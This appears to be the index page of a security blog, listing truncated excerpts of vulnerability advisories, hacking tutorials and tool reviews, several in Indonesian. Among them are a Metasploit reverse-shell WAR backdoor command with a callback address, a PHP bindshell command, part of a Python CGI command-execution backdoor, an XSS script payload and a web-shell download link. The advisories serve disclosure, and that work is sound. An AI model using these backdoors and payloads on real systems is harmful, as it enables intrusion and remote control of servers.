Security Advisory FileRun: Blind SQL Injection Vulnerability We discovered a vulnerability during a pentest in a file sharing web application named FileRun. It allows us to access files anywhere through a self-hosted secure cloud storage, backup and sharing files for photos, videos, files and more. The Vulnerability The vulnerability was discoveredafter the authentication. After we logged in
Web Security NetGain Enterprise Manager: Authentication Bypass / Local File Inclusion We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.647) during a pentest. We believe that this vulnerability is quite rare and worth to share. Local File Inclusion Normal Request: POST /u/jsp/log/download_do.jsp HTTP/1.1 Host: 192.168.0.21:8081 User-Agent: Mozilla/
Security Advisory Wordpress: Multiple Vulnerabilities in Simple Login Log Plugin We discovered a vulnerability in a WordPress plugin called Simple Login Log Plugin. Vulnerability: Authenticated Blind SQL Injection, Source IP Address Manipulation Affected Version: 1.1.1 (below version may be affected as well) Patched Version: Not available yet (vendor already contacted but no response) Blind SQL Injection =================== Affected URL:
Security Advisory NetGain Enterprise Manager: 'Ping' Command Injection We discovered a vulnerability on NetGain Enterprise Manager (ver. 7.2.562) during a pentest. We believe that this vulnerability is quite rare and worth to share. Description: Command injection is an attack in which the purpose is execution of arbitrary commands on the host operating system via a vulnerable
Security Advisory Wordpress Profile Builder Plugin: Stored XSS Simple stored Cross Site Scripting (XSS) found in WordPress Profile Builder Plugin version 5.2.7 and below. This is just a PoC example, just fill in the minimum password length field with [code]8″><script>alert(1)</script>[/code] [https://i2.wp.com/blog.
Security Advisory Centreon Enterprise Server 2.3.3 - 2.3.9-4: Blind SQL Injection We discovered the vulnerability when we’re looking for alternate software in network monitoring. We know and we love Nagios [http://www.nagios.org], and so the Centreon, they provide a very nice interface of Nagios. Centreon provide nice features and ease of use when you’re dealing with network
Security Advisory Trend Micro Control Manager: SQL Injection Vulnerability Trend Micro Control Manager prior to version 5.5 build 1823 (English and Japanese version) and version 6 build 1449 (English version only) are susceptible to SQL Injection. The application does not properly filter user-supplied input. The successful exploitation of this vulnerability could potentially result in arbitrary SQL command input
Security Advisory webERP: SQL Injection webERP (ver. 4.08.4) is a mature open-source ERP system providing best practice, multi-user business administration and accounting tools over the web. The vulnerability we discovered sits in the WO (work order) parameter, file WorkOrderEntry.php in the Manufacturing menu.
Security Advisory Trend Micro InterScan Messaging Security Suite: Multiple Vulnerabilities We discovered that Trend Micro InterScan Messaging Security Suite is vulnerable to Cross Site Scripting and Cross-site Request Forgery. Proof of Concept The vulnerabilities POC are as follow: Cross-site Scripting (CVE-2012-2995) (CWE-79) Persistent/Stored XSS hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"<script&
Security Advisory gtAkademik Gamatechno: SQL Injection and Persistent XSS We discovered that gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS). Stored/Persistent XSS The web application allows an attacker to inject XSS script inside the database (stored), because there is no sanitation process. There are 2 modules affected by XSS: Message Module and Update
Security Advisory Hexamail Server: Persistent XSS Vulnerability Hexamail Server version 4.4.5 or below is vulnerable to a persistent cross-site scripting (XSS) via HTML email. Vulnerability Description Hexamail Server suffers persistent XSS vulnerability in the mail body, allowing malicious user to execute scripts in a victim’s browser to hijack user sessions, redirect users, and or
Tutorials Create a WAR backdoor with Metasploit Facing a tomcat server.. and need to upload a WAR backdoor…??, well… we can create a WAR backdoor very easily with Metasploit, ok follow this steps: 1. Creating the backdoor. dudul@banget:~$ msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.96.1 W &gt; dudul.war Created
Tutorials CGI Backdoor for Linux with Python #!/usr/bin/env python # Info : Linux based CGI backdoor with python # author: otoy # date : 0x102010 import cgi,os,re,sys form = cgi.FieldStorage() cmd = form.getvalue('cmd', '') osexe = os.popen(cmd) dirt = os.getcwd()+'/' prognm = sys.argv[0].strip() progfl = re.findall(dirt+'
Web Security Web Links Gatherer (ver 2) By using Beautiful Soup [http://www.crummy.com/software/BeautifulSoup/], we can change the code as seen at the previous post to the code below… and it even works much better… just by changing the regex function, it return a better result : #!/usr/bin/python # otoy -- https://otoyrood.wordpress.
Tutorials Web Links Gatherer dengan Python program sederhana ini digunakan untuk mengumpulkan link-link yang ada pada sebuah halaman web, bisa juga di kembangkan menjadi sebuah crawler.. ? #!/usr/bin/python #info: program untuk mendapatkan info link-link # yang terdapat dalam sebuah halaman web # # otoy(https://otoyrood.wordpress.com) # 0x102010 from urllib import urlopen import re,sys peng = '
Web Security How to: SQLMap (dump and destroy) SQLMap is the tool to automate SQL Injection vulnerability exploitation. This tool is very popular to exploit the SQL Injection vulnerability. While most of web hacker enthusiast knew about this tool to gather information and retrieves the tables information, i try to share this information about the powerful of SQLMap
Web Security OWASP ModSecurity Core Rule Set ModSecurity is a good starting point to secure your web site. OWASP provides the core rule set (CRS) for ModSecurity rules against the most critical web application attack. From OWASP: > ModSecurity [http://www.modsecurity.org/] is an Apache web server module that provides a web application firewall engine. The
Web Security Membuat php bindshell (backdoor) dengan Metasploit Ingin membuat sebuah php bindshell dengan mudah..?? Metasploit adalah sebuah tool yang sangat powerfull, termasuk dalam urusan membuat php bindshell. Berikut ini langkah-langkah mudahnya: [+] Buat Bindshell. # msfpayload php/bind_php LPORT=55521 R > kutu.php KET: Perintah diatas akan membuat sebuah script php (kutu.php), yang berfungsi untuk membuat
Web Security Andiparos andiparos [http://code.google.com/p/andiparos/] merupakan fork dari Paros Proxy [http://www.parosproxy.org/]. sama seperti Netsparker [http://otoyrood.wordpress.com/2010/08/05/netsparker/] tool ini di tujukan untuk pengujian keamanan aplikasi web, tool ini adalah tool opensource. Ada beberapa hal yang menjadi fitur dari tool ini:
Web Security Netsparker Netsparker [https://www.mavitunasecurity.com/netsparker/] adalah sebuah sebuah web application security scanner tool, yang dapat membantu anda dalam melakukan pencarian celah keamana pada sebuah web. keunggulan dari program buatan Mavituna Security [https://www.mavitunasecurity.com] ini adalah, tool ini dapat melakukan uji coba terhadap kesalahan(bug) yang di temukannya,
Web Security DVWA: Damn Vulnerable Web App DVWA [http://www.dvwa.co.uk/] adalah aplikasi yang ditujukan untuk para Security Profesional untuk melakukan test terhadap skill yang mereka miliki, DVWA [http://www.dvwa.co.uk/] juga cocok bagi anda yang ingin mempelajari beberapa tehnik web-hacking terhadap aplikasi PHP/MySQL, seperti SQL injection, Remote Command Execution, dll. DVWA
Web Security PHPIDS Anda adalah seorang pemilik/programmer web berbasis PHP, dan tidak yakin dengan keamanan web yang anda miliki..?? PHPIDS [https://php-ids.org/] bisa anda jadikan solusi yang cukup ampuh untuk mencegah beberapa aksi Hacking terhadap web berbasis PHP, berikut ini beberapa serangan yang bisa di deteksi dan di cegah PHPIDS [https:
Web Security PHPJackal Sering bermain dengan PHPShell…?? ( ? ), PHPJackal [http://h.ackerz.com/index.php?p=/projects] adalah salah satu PHPShell yang layak dicoba, PHPShell ini memiliki beberapa fungsi yang menarik antara lain: * Hash Crackers * Network Scanner * WebProxy * dll Link download [https://h.ackerz.com/download.php?file=PHPJackal.php.gz]. Mirror [https://packetstormsecurity.
